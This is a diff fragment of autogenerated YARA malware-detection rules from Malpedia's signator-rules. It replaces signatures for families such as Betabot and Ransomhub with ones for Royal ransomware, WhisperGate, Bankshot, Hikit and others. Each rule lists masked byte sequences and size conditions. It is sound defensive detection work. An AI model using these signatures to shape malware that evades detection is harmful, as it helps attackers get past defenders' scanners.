+		$sequence_3 = { 85ed 7460 895c2410 8bd3 8bce 85f6 7454 }
+		$sequence_4 = { e9???????? 83f85b 751b 8bce e8???????? 8bce e8???????? }
+		$sequence_5 = { e8???????? 8b4c240c 83c404 83f903 751b 6a00 6a00 }
+		$sequence_6 = { ff7618 8bd7 e8???????? 8bd8 83c408 8bc2 8bcb }
+		$sequence_7 = { ff75ec ff75e8 ff75fc ff75f8 ff7514 53 eb2a }
+		$sequence_8 = { c3 8bff 55 8bec 5d e9???????? 6a00 }
+		$sequence_9 = { ffb674040000 e8???????? 8bf8 83c408 85ff 0f8595000000 50 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 19405824
 }
-rule MALPEDIA_Win_Betabot_Auto : FILE
+rule MALPEDIA_Win_Yibackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dcaf48d4-507f-5b26-9a58-f3ffaf812c78"
+		id = "bd826b97-b05e-574c-adcf-8cef34bea245"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.betabot_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yibackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yibackdoor_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "64a375dcaabd1648c075b4080e903b454efe58d8f528e81ccff7ee3035b4b817"
+		logic_hash = "72cc75115eff495a52d292944ce30cf871fe0425f0d810307073cc2873931dac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86970,32 +86988,32 @@ rule MALPEDIA_Win_Betabot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d0 2345fc eb02 33c0 c9 c20800 55 }
-		$sequence_1 = { ff15???????? 85c0 7413 8d4df8 e8???????? 50 8d45f8 }
-		$sequence_2 = { 7440 8d45f4 50 8d45f8 50 ff75fc ff15???????? }
-		$sequence_3 = { 8bc6 83e80c 53 57 741d 48 7551 }
-		$sequence_4 = { 8bec 81ecac000000 8365f800 8365f000 8365f400 8365fc00 }
-		$sequence_5 = { ff15???????? 85c0 7504 6a06 eb11 68???????? }
-		$sequence_6 = { 741a 837df800 7414 8b45f8 8b4804 e8???????? 8945fc }
-		$sequence_7 = { a3???????? 8bc7 5f 5e 5d c20400 55 }
-		$sequence_8 = { ff15???????? 85c0 75df 6a32 58 ebdc 55 }
-		$sequence_9 = { 8d04b8 833800 7414 ff30 ff45fc e8???????? 8b460c }
+		$sequence_0 = { 4c897ddf 488b18 e8???????? 488d4d6f 4c8bc3 48894c2440 }
+		$sequence_1 = { 33f6 4d85db 744a 4f8d0c00 498bf8 4d85c0 7439 }
+		$sequence_2 = { 743f 4180f97b 0f84b6000000 4180f92d 740e 4180e930 4180f909 }
+		$sequence_3 = { 33c9 e8???????? 488b4def ffd0 4c3965f7 741e 41b9fc000000 }
+		$sequence_4 = { ff15???????? 488b5c2450 448d4fda 33d2 33c9 41b842a86f9e e8???????? }
+		$sequence_5 = { 488bd8 e8???????? 488bcb 4c8b4008 488b10 e8???????? 488d15cd5c0000 }
+		$sequence_6 = { 448bc2 41c1e803 4183f80a 7de8 4d85d2 7464 4885db }
+		$sequence_7 = { 458bfe e8???????? 4533c9 4489742420 4533c0 33d2 }
+		$sequence_8 = { c3 33d2 488bc1 4885c9 7505 c3 4883c102 }
+		$sequence_9 = { 488b5028 c745db05000000 e8???????? 488bd0 488d4de3 e8???????? }
 
 	condition:
-		7 of them and filesize < 835584
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Dispcashbr_Auto : FILE
+rule MALPEDIA_Win_Royal_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55df9dfe-3a05-5311-b783-4a51e2e4694d"
+		id = "b707ba7e-f795-5786-96ea-1fd46c83e33f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dispcashbr_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.royal_ransom_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "086284cd3c4f836fd2903e8ee5f20f6af858fd595f5b202fe80164aaffa860ae"
+		logic_hash = "ff950c4f22d55465d57ffb0791253a97dd6631f204494c457bce80921890bdb0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87009,32 +87027,32 @@ rule MALPEDIA_Win_Dispcashbr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83ec08 c7442408c8ffffff c7442404???????? }
-		$sequence_1 = { e8???????? e9???????? c70424f5ffffff e8???????? }
-		$sequence_2 = { c744240404000000 890424 e8???????? 83ec08 c7442408f2ffffff }
-		$sequence_3 = { c744240404000000 890424 e8???????? 83ec08 c7442408c9ffffff c7442404???????? a1???????? }
-		$sequence_4 = { c744240404000000 890424 e8???????? 83ec08 c7442408eaffffff c7442404???????? a1???????? }
-		$sequence_5 = { 890424 e8???????? 83ec08 c7442408c8ffffff }
-		$sequence_6 = { e8???????? 83ec08 c7442408c9ffffff c7442404???????? a1???????? 83c020 890424 }
-		$sequence_7 = { c744240404000000 890424 e8???????? 83ec08 c7442408fcffffff c7442404???????? }
-		$sequence_8 = { 83c020 8944240c c744240822000000 c744240401000000 c70424???????? e8???????? }
-		$sequence_9 = { 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408e6ffffff c7442404???????? }
+		$sequence_0 = { e8???????? 4c8d059b3b1400 ba8f000000 e9???????? 488b4608 8b08 e8???????? }
+		$sequence_1 = { 803d????????00 754c 488d0d5c220d00 48890d???????? 488d050e1f0d00 488d0d37210d00 488905???????? }
+		$sequence_2 = { e8???????? 482be0 488bfa 488bd9 4885c9 747e 488d156abf0600 }
+		$sequence_3 = { 85c0 0f450d???????? 85c9 7411 488d0d31212400 e8???????? 4885c0 }
+		$sequence_4 = { e8???????? 4c8d0503171400 8d562b 488d0d09171400 e8???????? 4533c0 8d4e10 }
+		$sequence_5 = { c3 e8???????? 4c8d0553bd1400 ba8f010000 488d0d2fbd1400 e8???????? 4533c0 }
+		$sequence_6 = { e8???????? 397010 0f84ccfeffff e8???????? 4c8d052eb91400 ba66000000 488d0deab81400 }
+		$sequence_7 = { 754c e8???????? 4c8d05aeb81600 bae9000000 488d0d8ab81600 e8???????? 4533c0 }
+		$sequence_8 = { e8???????? 4c8d0533510e00 bac1010000 488d0da7500e00 e8???????? 4533c0 8d4f39 }
+		$sequence_9 = { c3 49ff80c0000000 488bcb 488b4308 8b10 e8???????? b801000000 }
 
 	condition:
-		7 of them and filesize < 123904
+		7 of them and filesize < 6235136
 }
-rule MALPEDIA_Win_Unidentified_053_Auto : FILE
+rule MALPEDIA_Win_Hikit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44778796-93f3-5879-994d-5e3e2324b3e0"
+		id = "cf2c2140-f351-5d9d-a962-449d1b05d24a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_053_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hikit_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "0ba9fcbf3221aa7fe9aa16ac81cd13a3c2e0b0b30a12bf9f5e09619187f5d921"
+		logic_hash = "d51c1ae21b05f4f7340fe9215a9d683066cb3055762a66620984bf5bd09e28e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87048,32 +87066,32 @@ rule MALPEDIA_Win_Unidentified_053_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f857afeffff 393cb500924100 742e a1???????? 8d70ff 85f6 }
-		$sequence_1 = { 0fb6bdb0fffcff c1e208 0bd7 03d0 2bca 6a00 }
-		$sequence_2 = { 754d 53 57 8d3c85a8914100 833f00 bb00100000 7520 }
-		$sequence_3 = { 7e13 8d048dfc914100 3938 7408 4a }
-		$sequence_4 = { 8a6e1b 0fb64619 0fb67df4 8a4e1a }
-		$sequence_5 = { 81e9003ca875 87d6 4e 46 87d6 81c1003ca875 }
-		$sequence_6 = { 0fb6d2 f6820194410004 7406 8b10 41 }
-		$sequence_7 = { c1c719 e8???????? 87f2 e8???????? 2bd5 }
-		$sequence_8 = { 891d???????? 4a 87d6 8915???????? 03f7 46 893d???????? }
-		$sequence_9 = { 8b048588814100 234508 8b4e14 8d04c1 0fb64801 8b5004 83fa10 }
+		$sequence_0 = { 8b442408 39442418 0f84e8000000 c744240401000000 8b442408 89442428 8b442428 }
+		$sequence_1 = { 48 c784245001000000000000 48 c744244000000000 48 c784244801000000000000 48 }
+		$sequence_2 = { 68???????? 6a24 8b45f8 83c004 50 e8???????? 83c424 }
+		$sequence_3 = { 52 8d8c2498120000 51 33c9 03c0 8d510c }
+		$sequence_4 = { 7408 81f90c000140 7506 8988e0000000 ff7514 ff7510 51 }
+		$sequence_5 = { 0f8427020000 8d8758080000 50 ff15???????? f6460d04 7546 8b4608 }
+		$sequence_6 = { 48 03c1 48 89442440 48 8b842488010000 0fb600 }
+		$sequence_7 = { 85c0 0f8e84000000 48 8b442428 0fb7501a 48 8b4c2428 }
+		$sequence_8 = { 7e0c 48 8b442450 c6803201000000 48 8b442450 0fb68031010000 }
+		$sequence_9 = { 48 8b442420 8b5028 48 c1ea0c 48 8b442420 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Netspy_Auto : FILE
+rule MALPEDIA_Win_Royal_Dns_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "57c767b8-cd93-5302-911f-6988f847c306"
+		id = "8e4eee0e-991f-5e5c-8e46-34ff6666420e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netspy_auto.yar#L1-L100"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.royal_dns_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "ecbb26e5fda724e71586bc695509ce41d8249123e16dac20dd9df75d451bc239"
+		logic_hash = "ebf3458b22350e610da4d705384f784d27dfca7bf952035b68054c9acd2a2a7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87087,30 +87105,32 @@ rule MALPEDIA_Win_Netspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4829c4 488b8538340000 4889e1 48898d704d0000 e8???????? }
-		$sequence_1 = { e9???????? 8b858c170000 3da1b579e1 0f84d92c0000 e9???????? 8b858c170000 3da646bcce }
-		$sequence_2 = { 48898510130000 8b15???????? 833d????????0a 0f9cc1 }
-		$sequence_3 = { a801 0f8505000000 e9???????? 488b8da0380000 448b859c380000 }
-		$sequence_4 = { b8a51c0a0c f6c201 0f45c8 488b85c84a0000 8908 8b15???????? }
-		$sequence_5 = { 4889e1 48898d90560000 e8???????? 4829c4 }
-		$sequence_6 = { e9???????? 488b85384d0000 8b00 8985544d0000 e9???????? 488b85404d0000 8a00 }
-		$sequence_7 = { 448b855c570000 4889c4 b9bc3715ff b88819ea06 }
+		$sequence_0 = { 83c40c 56 83c30d 8d85d8fcffff 53 50 }
+		$sequence_1 = { 83c404 83bdb1f7ffff64 8b8dbbf7ffff 8d70f1 7559 83f964 7554 }
+		$sequence_2 = { f3a5 e8???????? 83c40c b908000000 }
+		$sequence_3 = { be???????? 8d7dd8 f3a5 83c40c 6a01 a4 e8???????? }
+		$sequence_4 = { 0fb65c0602 c1ea07 03db 0bd3 83e21f 0fb69248132500 885104 }
+		$sequence_5 = { 8d85c0feffff 6a00 50 c785b0feffffa9ea6152 c785b4feffffe7a5db56 }
+		$sequence_6 = { 7416 83fe04 7511 8b95bff7ffff 89957cf1ffff e9???????? 85c9 }
+		$sequence_7 = { 6888130000 ff15???????? 4e 75f2 68e4000000 8d85c0f5ffff 6a00 }
+		$sequence_8 = { 393d???????? 7c11 6860ea0000 ffd6 c705????????00000000 68b80b0000 }
+		$sequence_9 = { 772a ff248590162400 6a01 6a03 }
 
 	condition:
-		7 of them and filesize < 12033024
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Ratankba_Auto : FILE
+rule MALPEDIA_Win_Whispergate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a3f1f15-dacb-52cd-b11b-5a08568d4510"
+		id = "9dc05d10-b36b-5ddc-8d53-1a84a19c9fff"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ratankba_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.whispergate_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "245ded0bb432e91f4a3aadcb5c1a265abfb5f2ea6a66bf5a1e4eebc1e9edd031"
+		logic_hash = "f1a5fde20ead0d040272e28cb5dd9257a9305ae69c007901daa130bb710a267b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87124,34 +87144,34 @@ rule MALPEDIA_Win_Ratankba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b17 8d0c8500000000 51 6a00 52 e8???????? 8b06 }
-		$sequence_1 = { c745fcffffffff 899edc000000 899ee0000000 39bdd0d5ffff 720f 8b8dbcd5ffff 51 }
-		$sequence_2 = { 8d8db4feffff 53 51 c785b4feffff00000000 e8???????? 8bd8 }
-		$sequence_3 = { 751b 8b45f8 3bc3 7409 50 e8???????? 83c404 }
-		$sequence_4 = { 8b9510ffffff 85f6 744d 8b8ddcfeffff bb10000000 395914 7202 }
-		$sequence_5 = { 8b5304 6a18 8944ca04 e8???????? 8bf0 85f6 0f8837ffffff }
-		$sequence_6 = { e8???????? 8b5004 8b45e4 8b4cd004 51 e8???????? }
-		$sequence_7 = { 8986b8010000 8986bc010000 899eb0010000 c786b401000060ea0000 8bc6 8b4df4 }
-		$sequence_8 = { 48 3bc7 7224 b857000780 e8???????? 8bc7 e8???????? }
-		$sequence_9 = { 83c404 898394000000 85c0 0f847d000000 8b8d10efffff 51 }
+		$sequence_0 = { 85c0 89f4 0f841bffffff 8b5508 85d2 0f8410ffffff 8b5508 }
+		$sequence_1 = { 83f801 0f8543010000 83c30c 81fb???????? 0f8389000000 8b13 8b7b04 }
+		$sequence_2 = { 83c301 ebe1 83c301 ebe3 8d6b01 e9???????? }
+		$sequence_3 = { b8???????? c705????????01000000 2d???????? 83f807 7ee0 57 }
+		$sequence_4 = { 53 83ec4c f605????????02 0f84ea020000 e8???????? 8965c4 }
+		$sequence_5 = { 84d2 7906 81cf00ffffff 29f7 8d54241c }
+		$sequence_6 = { c1e004 e8???????? 8b4de0 29c4 }
+		$sequence_7 = { 83f802 89c1 7417 8d65f4 89c8 5b }
+		$sequence_8 = { 5e c3 31d2 89d0 c3 }
+		$sequence_9 = { c706???????? 893424 8b4d10 89fa 89d8 e8???????? }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE
+rule MALPEDIA_Win_Bankshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9dfe6899-2a2b-53e4-a45a-9d47fab0bd97"
+		id = "c44209fc-b1c7-5402-9078-b4bcc5bc536b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.data_exfiltrator_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bankshot_auto.yar#L1-L435"
 		license_url = "N/A"
-		logic_hash = "76dad4826c4efcd47bcf7b7baeb8873c247d502d84bcb2a2073a82e8e3d63f8c"
+		logic_hash = "63bc5c29766faa4a92cc1d97b03d2ca49fa1b92e737ecc0b56db090eb70af715"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87163,32 +87183,67 @@ rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 48837c246800 7504 33c0 eb19 488b542450 488b4c2468 }
-		$sequence_1 = { 488b442430 8b4c2438 89480c 488b442430 4881c4e8000000 c3 }
-		$sequence_2 = { 488d152b530000 488b4c2440 ff15???????? 4889442420 }
-		$sequence_3 = { 8a442470 88442440 48c744243800000000 488d0595c8ffff 4889442430 488d0555d9ffff 4889442428 }
-		$sequence_4 = { 448bc8 4c8b442420 488b15???????? 488d4c2460 }
-		$sequence_5 = { 48894c2408 4883ec78 ff15???????? 41b800010000 }
-		$sequence_6 = { 85c0 742c 0fb6442421 8b4c2424 83c105 8bc9 488b942440010000 }
-		$sequence_7 = { 488d0dad360000 e8???????? 41b840000000 ba00300000 b908000000 }
-		$sequence_8 = { 837c245c00 7407 837c244000 7502 eb33 8b442440 }
-		$sequence_9 = { 488bc1 4889842498000000 488b942498000000 488b8c24c8000000 }
+		$sequence_0 = { 8bec 81ec48040000 a1???????? 33c5 8945f8 53 }
+		$sequence_1 = { 8bf8 8d5101 8a01 41 84c0 75f9 57 }
+		$sequence_2 = { 68???????? ff7604 ff15???????? 81be2005000000008000 894608 751c 6a04 }
+		$sequence_3 = { 0f2815???????? 8bf2 2bf0 660f1f440000 0f10840de43fffff 0f28ca 660fefc8 }
+		$sequence_4 = { 0fb611 0fb6c0 eb17 81fa00010000 7313 8a87bce10110 }
+		$sequence_5 = { 83c8e0 40 0f280d???????? 8bf2 2bf0 660f1f440000 0f10840de4bfffff }
+		$sequence_6 = { 6a01 56 56 8975fc ff15???????? 85c0 7450 }
+		$sequence_7 = { c74048b8e40110 8b4508 6689486c 8b4508 66898872010000 8b4508 83a04c03000000 }
+		$sequence_8 = { 8b45fc 817848b8e40110 7409 ff7048 e8???????? 59 c70701000000 }
+		$sequence_9 = { 57 50 e8???????? 83c40c 6b45e430 8945e0 8d80d0e10110 }
+		$sequence_10 = { 81fa00010000 7313 8a87bce10110 08441619 42 0fb64101 }
+		$sequence_11 = { 894de4 3998c0e10110 0f84ea000000 41 83c030 894de4 3df0000000 }
+		$sequence_12 = { 33c0 6800000020 66898475ccfbffff 8d85ccfbffff }
+		$sequence_13 = { e8???????? 83c40c e8???????? 99 b907000000 f7f9 }
+		$sequence_14 = { 8a06 8d7601 884431ff 84c0 75f3 68???????? 8d730c }
+		$sequence_15 = { c700???????? 8b4508 898850030000 8b4508 59 c74048b8e40110 8b4508 }
+		$sequence_16 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d90c4e10110 }
+		$sequence_17 = { c644243b7b c644243cc1 884c243d c644243ef5 }
+		$sequence_18 = { 6b05????????3c 0305???????? 0fb74df4 6bd13c 0fb74df6 }
+		$sequence_19 = { 8b442454 50 ff15???????? b801000000 }
+		$sequence_20 = { 488d91f00f0000 e8???????? 41bb12000000 488d158b760000 }
+		$sequence_21 = { 51 8d9508f8ffff 52 ff15???????? }
+		$sequence_22 = { 83c20f 8955dc 8b55ec 81c2e80e0000 52 }
+		$sequence_23 = { 41ffcb 4183cbf0 41ffc3 488d9530010000 b904010000 44891d???????? }
+		$sequence_24 = { 895c242c ff15???????? b910000000 33c0 }
+		$sequence_25 = { 2b8534feffff 3dd0070000 7307 33c0 e9???????? 8d8d5cfeffff 51 }
+		$sequence_26 = { 57 e8???????? 83c40c 85c0 7506 8d4707 50 }
+		$sequence_27 = { e8???????? 83c408 c78424a804000000000000 c78424a404000009303b00 8d8424a4040000 6808040000 eb80 }
+		$sequence_28 = { c785a4fbffff00000000 682c010000 ff15???????? c705????????00000000 68???????? ff15???????? }
+		$sequence_29 = { ff15???????? 4885c0 0f85a7010000 448d4870 448d402e 488d15ce520000 }
+		$sequence_30 = { 488d55c0 488bcb ff15???????? 4885c0 0f85df020000 488d55e0 488bcb }
+		$sequence_31 = { 59 eb33 8b7dd0 8b45e4 8b4de8 8b0485c8887100 }
+		$sequence_32 = { 57 c685b8feffff00 6803010000 6a00 8d85b9feffff 50 }
+		$sequence_33 = { e8???????? a1???????? 0f1005???????? 898584fbffff 66a1???????? }
+		$sequence_34 = { c64424210d e8???????? 8b4c2410 8b542414 8b442418 890d???????? }
+		$sequence_35 = { c6442421cd c64424229c c64424231d c644242436 }
+		$sequence_36 = { 57 8db8607d0110 57 ff15???????? ff0d???????? 83ef18 }
+		$sequence_37 = { c644241bc4 c644241c90 c644241d9c c644241e46 c644241f7b c64424209d }
+		$sequence_38 = { 4803d1 ffe2 4c8b05???????? 498d5106 488bcf }
+		$sequence_39 = { ff15???????? 488d15a6f20000 488d4c2420 488905???????? }
+		$sequence_40 = { 33c0 ffc2 83fa0a 7ce4 b80b000000 c3 }
+		$sequence_41 = { 83c410 8d4c2460 8d542408 51 683f000f00 6a00 }
+		$sequence_42 = { c3 4889b424b0450000 4889bc24b8450000 4c89ac24c0450000 }
+		$sequence_43 = { 83c40c 8d85bcfbffff 50 6804010000 ff15???????? 8d85bcfeffff 50 }
+		$sequence_44 = { 57 8b3d???????? 8bf1 68???????? 89b55cf2ffff 660fd645f0 8945f8 }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 860160
 }
-rule MALPEDIA_Win_Ransomhub_Auto : FILE
+rule MALPEDIA_Win_Nailao_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3e3a1e40-e1d1-52bd-84f7-e9d4fbcb059d"
+		id = "e45fdbac-42d1-5920-9b35-9a9e44ef7d5d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomhub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransomhub_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nailao_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nailao_locker_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "04cb851589645119dff5d45b0c40a2835781fcc030d792f49fd4c3e1be1bf3b4"
+		logic_hash = "b259eb4feabff6fee143b3ad97a8691b9630885ab19604f45e8a846a4deaff46"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87202,32 +87257,32 @@ rule MALPEDIA_Win_Ransomhub_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0f 488d3dbb5d5100 0f1f00 e8???????? e8???????? 48891d???????? 833d????????00 }
-		$sequence_1 = { e8???????? 488d3d03f63300 0f1f00 e8???????? e8???????? 4889842430190000 48899c24b00a0000 }
-		$sequence_2 = { bb07000000 488bac2488000000 4881c490000000 c3 488d058db90b00 bb07000000 488bac2488000000 }
-		$sequence_3 = { bf01000000 488b8424f00b0000 e8???????? 4c8b8c24f00b0000 41ff8980000000 488b8c2488030000 488b8424b8030000 }
-		$sequence_4 = { b90f000000 e8???????? 48898424000e0000 48899c24b8000000 488b15???????? 48899424c0110000 488d0580fd2800 }
-		$sequence_5 = { 48c744243400000000 0fb6542449 0fb6742443 01f2 0fb6742442 0fb67c244c 440fb6442457 }
-		$sequence_6 = { eb09 4889c7 90 e8???????? 488d05d40d2f00 488b5c2438 488d0db3af3300 }
-		$sequence_7 = { 4d8d0cb0 4d8d49fc 450fb609 488d4701 4839c1 0f86ff000000 4829f2 }
-		$sequence_8 = { c3 80fb2d 0f85be010000 8400 833d????????00 750c 488d0dbdfa2800 }
-		$sequence_9 = { e8???????? 4889442428 48c70000000000 488d05b41b0700 e8???????? 4889442420 488d05a3ea0900 }
+		$sequence_0 = { ff15???????? 4c8d4c2474 488bcb 4c8d44246c 488d542464 ff15???????? }
+		$sequence_1 = { 488bc5 4c8d0551650100 488bcd 48c1f906 83e03f 498b0cc8 488d14c0 }
+		$sequence_2 = { 488bd8 4885c0 7560 488bc7 4c8d35104cffff 498784f620120200 }
+		$sequence_3 = { e8???????? 4c8d458c 488bd7 85c0 7411 448bc8 488d0ddd7a0100 }
+		$sequence_4 = { 48c744242000000000 488bce ff15???????? 85c0 741d 41ffc6 }
+		$sequence_5 = { c705????????01000000 b808000000 486bc000 488d0d19d80100 8b542430 48891401 }
+		$sequence_6 = { 488d0ddd7a0100 e8???????? eb58 488d0d1f7b0100 eb47 488d1596790100 488bcb }
+		$sequence_7 = { e8???????? 488d156f870100 488d4c2420 e8???????? }
+		$sequence_8 = { ff15???????? 85c0 750d 4c8d442450 488bd7 e8???????? 83eb01 }
+		$sequence_9 = { 488985d0070000 49895b20 488bfa 498973e8 4d896bd8 4d8be8 }
 
 	condition:
-		7 of them and filesize < 12821504
+		7 of them and filesize < 512000
 }
-rule MALPEDIA_Win_Himera_Loader_Auto : FILE
+rule MALPEDIA_Win_Isr_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d48b80f9-ba7c-5b70-abe3-35c7e699db08"
+		id = "f92134ff-d8ee-58cb-8cb8-468d7205306f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.himera_loader_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isr_stealer_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "ac37c3c2c74b38220d6622ffc9fadece4f2263ad47a93b2ffce232c15567e711"
+		logic_hash = "75691989209029cb7a637cf5df87a857ef3ef18b6fe3194f56cba1ecab86658c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87241,32 +87296,32 @@ rule MALPEDIA_Win_Himera_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645e656 c645e70e c645e801 c645e90e c645ea18 c645eb1a }
-		$sequence_1 = { 83e03f c1f906 6bd038 8b0c8d00a14200 804c112802 5b }
-		$sequence_2 = { 83bd00faffff00 7409 83bd1cfaffff00 7504 33c0 }
-		$sequence_3 = { 0f84d3000000 8b048d7c3c4200 89858cf8ffff 85c0 0f8498000000 83f801 0f84b5000000 }
-		$sequence_4 = { 6689411e 6a10 ba02000000 c1e204 8b4508 0fb70c10 }
-		$sequence_5 = { 0fb6d0 85d2 744c 8d4df0 e8???????? 8945e8 8b45e8 }
-		$sequence_6 = { e8???????? 83c404 33d2 88957582ffff }
-		$sequence_7 = { 8d950c82ffff 52 8d85ec81ffff 50 8d8de881ffff 51 }
-		$sequence_8 = { 8945f0 50 8d45f4 64a300000000 894da4 c745a048000000 c645a846 }
-		$sequence_9 = { e8???????? 8bc8 e8???????? 50 8b8d3082ffff }
+		$sequence_0 = { fb b05e 2bc1 e8???????? 661e }
+		$sequence_1 = { 08ac22c115978d 0e e8???????? 07 }
+		$sequence_2 = { 1c8b 53 2456 2bd1 807e6543 }
+		$sequence_3 = { 46 1e 301b 15c2c8c807 d6 12d8 }
+		$sequence_4 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e e8???????? }
